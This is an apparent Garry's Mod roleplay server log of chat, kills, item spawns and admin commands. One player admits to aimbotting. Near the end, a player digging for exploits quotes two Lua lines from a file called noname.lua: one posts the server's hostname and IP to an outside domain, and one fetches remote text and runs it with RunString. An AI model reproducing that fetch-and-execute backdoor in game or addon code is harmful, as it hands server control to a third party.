Mon Sep  2 19:22:44 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // where at
Mon Sep  2 19:22:52 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:23:39 2019	Thomasツ (STEAM_0:0:121940340): // icant even afford ammo :/
Mon Sep  2 19:23:52 2019	DrDerpenstein (STEAM_0:0:13562763): /dropmoney 20000
Mon Sep  2 19:23:53 2019	DrDerpenstein (STEAM_0:0:13562763) has dropped $20,000
Mon Sep  2 19:24:15 2019	bobbicus has a wonderful voice was killed by Derp with a weapon_fists
Mon Sep  2 19:24:19 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:24:33 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 19:24:33 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 19:24:33 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 19:24:33 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 19:24:35 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 19:24:35 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 19:24:36 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 19:24:36 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 19:24:36 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 19:24:36 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 19:24:36 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 19:24:37 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 19:24:37 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 19:24:37 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_altfire
Mon Sep  2 19:24:37 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_altfire
Mon Sep  2 19:24:38 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_rpg_round
Mon Sep  2 19:24:38 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_rpg_round
Mon Sep  2 19:24:38 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_rpg_round
Mon Sep  2 19:24:38 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_crossbow
Mon Sep  2 19:24:39 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_crossbow
Mon Sep  2 19:24:39 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 19:24:39 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 19:24:39 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 19:24:40 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:24:40 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:24:40 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:24:42 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:24:42 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:24:43 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:25:01 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 19:25:02 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 19:25:02 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 19:25:03 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 19:25:03 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 19:25:03 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 19:25:03 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 19:25:03 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 19:25:05 2019	Derp was killed by bobbicus has a wonderful voice with a cw_p99
Mon Sep  2 19:25:07 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:25:35 2019	Derp was killed by DrDerpenstein with a cw_ws_m16a4
Mon Sep  2 19:25:36 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:25:51 2019	Thomasツ was killed by bobbicus has a wonderful voice with a cw_p99
Mon Sep  2 19:25:54 2019	Thomasツ (STEAM_0:0:121940340): // why
Mon Sep  2 19:26:00 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // wrong button sorry
Mon Sep  2 19:26:05 2019	Thomasツ (STEAM_0:0:121940340): // 5 times?
Mon Sep  2 19:26:10 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // yes?
Mon Sep  2 19:26:13 2019	Thomasツ (STEAM_0:0:121940340) spawned
Mon Sep  2 19:26:13 2019	DrDerpenstein (STEAM_0:0:13562763): // he's meeming
Mon Sep  2 19:26:21 2019	Thomasツ (STEAM_0:0:121940340): // can i have my gun back
Mon Sep  2 19:26:25 2019	DrDerpenstein (STEAM_0:0:13562763): /pm thomas want us to take it to sit?
Mon Sep  2 19:26:25 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // what gun wtf!?
Mon Sep  2 19:26:30 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_jar
Mon Sep  2 19:26:31 2019	Thomasツ (STEAM_0:0:121940340): // cw_ws_m16a4
Mon Sep  2 19:26:41 2019	Thomasツ (STEAM_0:0:121940340): cw_ws_m16a4
Mon Sep  2 19:26:42 2019	Thomasツ (STEAM_0:0:121940340): 
Mon Sep  2 19:26:42 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): /drop
Mon Sep  2 19:26:43 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 19:26:43 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 19:26:43 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 19:26:43 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 19:26:45 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:26:45 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:26:45 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:26:46 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:26:47 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 19:26:47 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // come here
Mon Sep  2 19:26:51 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // i spawned one
Mon Sep  2 19:27:24 2019	DrDerpenstein was killed by Derp with a cw_ws_m16a4
Mon Sep  2 19:27:27 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:27:28 2019	bobbicus has a wonderful voice was killed by Thomasツ with a cw_ws_m16a4
Mon Sep  2 19:27:29 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:27:52 2019	bobbicus has a wonderful voice was killed by Thomasツ with a cw_ws_m16a4
Mon Sep  2 19:27:54 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:28:10 2019	DrDerpenstein was killed by bobbicus has a wonderful voice with a cw_p99
Mon Sep  2 19:28:12 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:28:19 2019	bobbicus has a wonderful voice was killed by Thomasツ with a cw_ws_m16a4
Mon Sep  2 19:28:20 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:28:23 2019	Thomasツ (STEAM_0:0:121940340): / /hwo
Mon Sep  2 19:28:32 2019	Thomasツ (STEAM_0:0:121940340): // how are you hiting me
Mon Sep  2 19:28:35 2019	DrDerpenstein (STEAM_0:0:13562763): /job Citizen
Mon Sep  2 19:28:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_bong03_ent
Mon Sep  2 19:29:01 2019	DrDerpenstein was killed by Derp with a cw_ws_m16a4
Mon Sep  2 19:29:07 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:29:30 2019	DrDerpenstein was killed by bobbicus has a wonderful voice with a cw_p99
Mon Sep  2 19:29:32 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:29:34 2019	Derp was killed by bobbicus has a wonderful voice with a cw_p99
Mon Sep  2 19:29:34 2019	bobbicus has a wonderful voice was killed by Thomasツ with a cw_ws_m16a4
Mon Sep  2 19:29:35 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:29:35 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:29:57 2019	bobbicus has a wonderful voice was killed by DrDerpenstein with a cw_ak74
Mon Sep  2 19:30:00 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:30:03 2019	Derp was killed by bobbicus has a wonderful voice with a cw_p99
Mon Sep  2 19:30:03 2019	DrDerpenstein was killed by bobbicus has a wonderful voice with a cw_p99
Mon Sep  2 19:30:03 2019	Thomasツ was killed by bobbicus has a wonderful voice with a cw_p99
Mon Sep  2 19:30:04 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:30:10 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:30:11 2019	Thomasツ (STEAM_0:0:121940340): // ok yeah
Mon Sep  2 19:30:12 2019	Thomasツ (STEAM_0:0:121940340) spawned
Mon Sep  2 19:30:25 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // ok yeah what
Mon Sep  2 19:30:41 2019	DrDerpenstein (STEAM_0:0:13562763): // please stop aimbotting
Mon Sep  2 19:30:46 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // okay men
Mon Sep  2 19:30:54 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // ill turn them off dw
Mon Sep  2 19:30:58 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) disconnected
Mon Sep  2 19:31:26 2019	Thomasツ (STEAM_0:0:121940340): /dorp
Mon Sep  2 19:31:31 2019	Thomasツ (STEAM_0:0:121940340): /drop
Mon Sep  2 19:35:41 2019	bert simson (STEAM_0:1:179345279) has joined the game
Mon Sep  2 19:35:41 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:36:15 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_bong03_ent
Mon Sep  2 19:36:43 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // there
Mon Sep  2 19:36:47 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // they're actually off
Mon Sep  2 19:36:55 2019	DrDerpenstein (STEAM_0:0:13562763): // yeet
Mon Sep  2 19:37:15 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) disconnected
Mon Sep  2 19:39:18 2019	bert simson (STEAM_0:1:179345279) has joined the game
Mon Sep  2 19:39:18 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:39:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_muffin
Mon Sep  2 19:39:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_muffin
Mon Sep  2 19:39:58 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zmlab_meth_baggy
Mon Sep  2 19:39:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zmlab_meth
Mon Sep  2 19:40:04 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zmlab_meth_baggy
Mon Sep  2 19:40:04 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zmlab_meth_baggy
Mon Sep  2 19:40:04 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zmlab_meth_baggy
Mon Sep  2 19:40:09 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zmlab_meth_baggy
Mon Sep  2 19:40:28 2019	Thomasツ (STEAM_0:0:121940340): /name afk
Mon Sep  2 19:40:32 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zmlab_meth_baggy
Mon Sep  2 19:40:34 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zmlab_meth_baggy
Mon Sep  2 19:40:36 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zmlab_meth_baggy
Mon Sep  2 19:42:17 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:42:17 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:42:17 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:42:17 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:42:21 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:42:21 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:42:24 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:45:37 2019	jd_hickey4560 (STEAM_0:1:100634110) has joined the game
Mon Sep  2 19:45:37 2019	jd_hickey4560 (STEAM_0:1:100634110) spawned
Mon Sep  2 19:46:13 2019	afk (STEAM_0:0:121940340): /name Thomasツ
Mon Sep  2 19:46:25 2019	afk (STEAM_0:0:121940340): /name Thomas
Mon Sep  2 19:47:53 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_jar
Mon Sep  2 19:47:55 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_bong03_ent
Mon Sep  2 19:47:56 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_bong03_ent
Mon Sep  2 19:48:24 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_bong03_ent
Mon Sep  2 19:48:41 2019	Thomas (STEAM_0:0:121940340): /drop
Mon Sep  2 19:49:18 2019	Derp (STEAM_0:0:52504530): 
Mon Sep  2 19:49:28 2019	Derp (STEAM_0:0:52504530): 
Mon Sep  2 19:49:32 2019	DrDerpenstein (STEAM_0:0:13562763): 
Mon Sep  2 19:50:01 2019	Derp was killed by Entity [0][worldspawn] with a unknown
Mon Sep  2 19:50:04 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:50:57 2019	jd_hickey4560 (STEAM_0:1:100634110) spawned
Mon Sep  2 19:54:59 2019	Thomas was killed by Himself with a suicide trick
Mon Sep  2 19:55:06 2019	Thomas (STEAM_0:0:121940340): // thats really op
Mon Sep  2 19:55:07 2019	Thomas (STEAM_0:0:121940340) spawned
Mon Sep  2 19:55:37 2019	DrDerpenstein was killed by Himself with a suicide trick
Mon Sep  2 19:55:47 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:56:56 2019	DrDerpenstein was killed by Thomas with a rj_molotov_hull
Mon Sep  2 19:57:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:58:44 2019	DrDerpenstein (STEAM_0:0:13562763) spawned Vehicle prop_vehicle_jeep (sw_fcc)
Mon Sep  2 19:59:17 2019	bobbicus has a wonderful voice was killed by DrDerpenstein with a prop_vehicle_jeep
Mon Sep  2 19:59:21 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): 
Mon Sep  2 19:59:29 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:59:47 2019	DrDerpenstein (STEAM_0:0:13562763): 
Mon Sep  2 19:59:51 2019	DrDerpenstein (STEAM_0:0:13562763): 
Mon Sep  2 20:00:05 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): i need financial compensation
Mon Sep  2 20:00:07 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): really
Mon Sep  2 20:00:16 2019	DrDerpenstein (STEAM_0:0:13562763): /dropmoney 1000
Mon Sep  2 20:00:17 2019	DrDerpenstein (STEAM_0:0:13562763) has dropped $1,000
Mon Sep  2 20:00:19 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): EW
Mon Sep  2 20:00:26 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // That was the ambulance ride alone!
Mon Sep  2 20:00:36 2019	DrDerpenstein (STEAM_0:0:13562763): /dropmoney 4000
Mon Sep  2 20:00:37 2019	DrDerpenstein (STEAM_0:0:13562763) has dropped $4,000
Mon Sep  2 20:00:42 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): that is okay
Mon Sep  2 20:01:36 2019	Derp was killed by DrDerpenstein with a prop_vehicle_jeep
Mon Sep  2 20:01:41 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 20:02:57 2019	DrDerpenstein was killed by Himself with a suicide trick
Mon Sep  2 20:03:01 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 20:06:41 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 20:06:41 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 20:06:41 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 20:06:41 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 20:06:42 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 20:06:42 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 20:06:42 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 20:06:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 20:06:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 20:06:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 20:06:56 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 20:06:56 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 20:06:56 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 20:06:57 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 20:06:57 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 20:06:57 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 20:06:57 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 20:06:58 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_altfire
Mon Sep  2 20:06:58 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 20:06:58 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 20:06:58 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 20:06:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 20:06:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 20:06:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 20:06:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 20:06:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_rpg_round
Mon Sep  2 20:07:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_rpg_round
Mon Sep  2 20:07:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 20:07:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 20:07:01 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_crossbow
Mon Sep  2 20:08:15 2019	Derp was killed by Entity [0][worldspawn] with a unknown
Mon Sep  2 20:08:15 2019	DrDerpenstein (STEAM_0:0:13562763): 
Mon Sep  2 20:08:16 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 20:08:40 2019	Thomas (STEAM_0:0:121940340): // almost 2 hrs
Mon Sep  2 20:08:46 2019	DrDerpenstein (STEAM_0:0:13562763): // nice
Mon Sep  2 20:10:06 2019	DrDerpenstein was killed by Thomas with a cw_shorty
Mon Sep  2 20:10:15 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 20:10:27 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // why do you have a shared lua file that just sends the host name and server ip to http://geckoproject.cf/id.php
Mon Sep  2 20:10:43 2019	DrDerpenstein (STEAM_0:0:13562763): what file?
Mon Sep  2 20:10:47 2019	DrDerpenstein (STEAM_0:0:13562763): // what file?
Mon Sep  2 20:10:48 2019	Derp (STEAM_0:0:52504530): // wat
Mon Sep  2 20:11:00 2019	Thomas (STEAM_0:0:121940340): // derp only 5 mins
Mon Sep  2 20:11:06 2019	jd_hickey4560 (STEAM_0:1:100634110) spawned
Mon Sep  2 20:11:11 2019	Thomas (STEAM_0:0:121940340): // can i get forums link again
Mon Sep  2 20:11:27 2019	Derp (STEAM_0:0:52504530): // u can access the forums if u press F4 and go to info
Mon Sep  2 20:11:28 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // idk im just lookin for exploits and I see noname.lua with
Mon Sep  2 20:11:29 2019	jd_hickey4560 (STEAM_0:1:100634110) disconnected
Mon Sep  2 20:11:29 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // http.Post("http://geckoproject.cf/id.php",{name= GetHostName() , host= game.GetIPAddress()},function( result ) end)
Mon Sep  2 20:11:36 2019	Thomas (STEAM_0:0:121940340): // oh yeah
Mon Sep  2 20:12:13 2019	DrDerpenstein (STEAM_0:0:13562763): // lemme check it out 1 sec
Mon Sep  2 20:12:36 2019	DrDerpenstein (STEAM_0:0:13562763): // what are you using to find that?
Mon Sep  2 20:12:59 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 20:13:09 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // just a tool that intercepts shared+client lua files from a server
Mon Sep  2 20:13:10 2019	DrDerpenstein (STEAM_0:0:13562763): // do you know what addon/where its comming from?
Mon Sep  2 20:13:56 2019	DrDerpenstein (STEAM_0:0:13562763): 
Mon Sep  2 20:14:07 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // its in the same directory where addons, games, lua and stuff are. its called noname.lua its just weird. also has a get 
Mon Sep  2 20:14:12 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // request for some other website
Mon Sep  2 20:15:48 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): Iyhttps://gyazo.com/4d32e9bbf5daf7d6404be77bd08d1c4c
Mon Sep  2 20:15:48 2019	Thomas (STEAM_0:0:121940340): // i applyed
Mon Sep  2 20:15:51 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): https://gyazo.com/4d32e9bbf5daf7d6404be77bd08d1c4c
Mon Sep  2 20:17:43 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): dont know what its about, look like the get request goes to some dead website as well
Mon Sep  2 20:17:45 2019	Derp (STEAM_0:0:52504530): choking on water? thats not allowed... DEMOTED
Mon Sep  2 20:18:20 2019	Thomas (STEAM_0:0:121940340): !jail @
Mon Sep  2 20:18:22 2019	Thomas (STEAM_0:0:121940340): !unjail @
Mon Sep  2 20:18:22 2019	DrDerpenstein (STEAM_0:0:13562763): i dont see noname.lua in our server list tho
Mon Sep  2 20:18:23 2019	Thomas (STEAM_0:0:121940340): !return @
Mon Sep  2 20:18:24 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:18:26 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): /shrug
Mon Sep  2 20:18:28 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): i dont know
Mon Sep  2 20:18:31 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:18:35 2019	DrDerpenstein (STEAM_0:0:13562763): the folder hierarchy doesnt match ours
Mon Sep  2 20:18:38 2019	Thomas (STEAM_0:0:121940340): [GmodAdminSuite] [FAIL] Sorry, but you do not have permission to accessthe GmodAdminSuite menu
Mon Sep  2 20:18:38 2019	Derp (STEAM_0:0:52504530): u cant use logs? is that what u said?
Mon Sep  2 20:18:43 2019	DrDerpenstein (STEAM_0:0:13562763): how did you dl those files?
Mon Sep  2 20:18:44 2019	Derp (STEAM_0:0:52504530): 
Mon Sep  2 20:18:47 2019	Thomas (STEAM_0:0:121940340): !unjail xd
Mon Sep  2 20:18:49 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:19:07 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:19:07 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:19:09 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:19:20 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:19:21 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:19:31 2019	Derp (STEAM_0:0:52504530): try using logs now
Mon Sep  2 20:19:33 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:19:35 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): just some tool, these are just shared and clientside files though. maybe its some serverside script making t
Mon Sep  2 20:19:35 2019	Thomas (STEAM_0:0:121940340): [GmodAdminSuite] [FAIL] Sorry, but you do not have permission to accessthe GmodAdminSuite menu
Mon Sep  2 20:19:42 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): hose clientside files
Mon Sep  2 20:19:44 2019	Derp (STEAM_0:0:52504530): its !gas
Mon Sep  2 20:19:44 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): /shrug
Mon Sep  2 20:19:48 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:19:49 2019	DrDerpenstein (STEAM_0:0:13562763): is that in your own steam directory?
Mon Sep  2 20:19:52 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:19:53 2019	Derp (STEAM_0:0:52504530): 
Mon Sep  2 20:19:54 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): no?
Mon Sep  2 20:19:59 2019	DrDerpenstein (STEAM_0:0:13562763): its on our server?
Mon Sep  2 20:20:06 2019	DrDerpenstein (STEAM_0:0:13562763): i legit cant find it
Mon Sep  2 20:20:16 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): i dont know, could just be a clientside file
Mon Sep  2 20:20:22 2019	Derp (STEAM_0:0:52504530): what happened when u type !gas
Mon Sep  2 20:20:26 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:20:27 2019	Thomas (STEAM_0:0:121940340): [GmodAdminSuite] [FAIL] Sorry, but you do not have permission to accessthe GmodAdminSuite menu
Mon Sep  2 20:20:32 2019	Derp (STEAM_0:0:52504530): 
Mon Sep  2 20:20:41 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): also this in it
Mon Sep  2 20:20:42 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): http.Fetch("http://geckoproject.cf/gubbibiggay.txt", function(b,l,h,c)RunString(b)end,nil)
Mon Sep  2 20:20:51 2019	DrDerpenstein (STEAM_0:0:13562763): lol whut
Mon Sep  2 20:21:16 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): dunno what function b is either
Mon Sep  2 20:21:18 2019	Derp (STEAM_0:0:52504530): 
Mon Sep  2 20:21:21 2019	Derp (STEAM_0:0:52504530): ok try now
Mon Sep  2 20:21:25 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:21:27 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:21:32 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:21:43 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:21:51 2019	Derp (STEAM_0:0:52504530): and yeah about godmode and cloak i have that disabled because i dont think mods need it
Mon Sep  2 20:22:03 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): looks like website is dead anyways
Mon Sep  2 20:22:37 2019	Derp (STEAM_0:0:52504530): u can set hp i believe
Mon Sep  2 20:22:49 2019	Thomas (STEAM_0:0:121940340): !hp Thomas 100
